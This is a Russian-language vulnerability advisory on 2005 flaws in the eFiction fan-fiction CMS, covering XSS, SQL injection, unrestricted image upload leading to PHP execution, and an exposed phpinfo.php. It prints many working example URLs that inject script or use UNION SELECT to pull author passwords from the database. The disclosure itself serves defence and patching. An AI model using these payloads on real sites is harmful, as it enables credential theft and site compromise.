Множественные уязвимости в eFiction

Дата публикации:
29.11.2005
Дата изменения:
24.03.2009
Всего просмотров:
2052
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-4167
CVE-2005-4171
CVE-2005-4172
CVE-2005-4173
CVE-2005-4174
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие системных данных
Неавторизованное изменение данных
Обход ограничений безопасности
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
eFiction 1.x
eFiction 2.x
Уязвимые версии: eFiction 1.0, 1.1 и 2.0.

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю получить доступ к потенциально важным данным, произвести XSS нападение и SQL-инъекцию и выполнить произвольный PHP сценарий на системе.

1. Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметре "let" сценария "titles.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

efiction 1.0/1.1:
http://[target]/efiction/titles.php?action=viewlist&
let=<script>alert(document.cookie)</script>

efiction 2.0 посредством SQL-инъекции:
http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%200,0,'<script>alert
(document.cookie)</script>',0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

2. SQL-инъекция возможна из-за недостаточной обработки входных данных в параметрах “let”, “sid” и “uid” в различных сценариях. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Пример:

efiction 1.0:
http://[target]/[path]/authors.php?action=viewlist&let=
'%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/*
http://[target]/[path]/authors.php?action=viewlist&let=
%27%20UNION%20SELECT%20password,password
%20FROM%20efiction_fanfiction_authors/*&offset=0,40/*
http://[target]/[path]/titles.php?action=viewlist&let=
'%20UNION%20SELECT%200,0,password,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20
FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION
%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20
SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0%20FROM%20fanfiction_authors%20/*

efiction 1.1:
http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%200,0,password,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname%20FROM
%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%20password,0,0,0,0,0,
penname,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%20penname,0,0,0,0,0,0,
0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,
password,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*
http://[target]/[path]/viewuser.php?uid='UNION%
20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,
0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20
SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0%20FROM%20efiction_fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20
SELECT%20penname,penname,password,penname,penname,
penname,penname,penname,penname,penname,penname,penname,
penname,penname,penname,penname,penname,penname,penname,
penname,penname,penname%20FROM%20fanfiction_authors%20/*

efiction 2.0
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION
%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,penname,0%20FROM%20fanfiction_authors%20/*

3. Уязвимость в "Manage Images" позволяет удаленному пользователю загрузить валидные изображения с произвольным расширением. Удаленный пользователь может загрузить валидное изображение, содержащее PHP код и выполнить его с привилегиями web сервера.

4. Удаленный пользователь может запросить сценарий "phpinfo.php" и получить потенциально важную информацию о системе.

URL производителя: www.efiction.wallflowergirl.com

Решение: Установите последнюю версию с сайта производителя.

Источник:

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: eFiction Multiple Vulnerabilities

или введите имя

CAPTCHA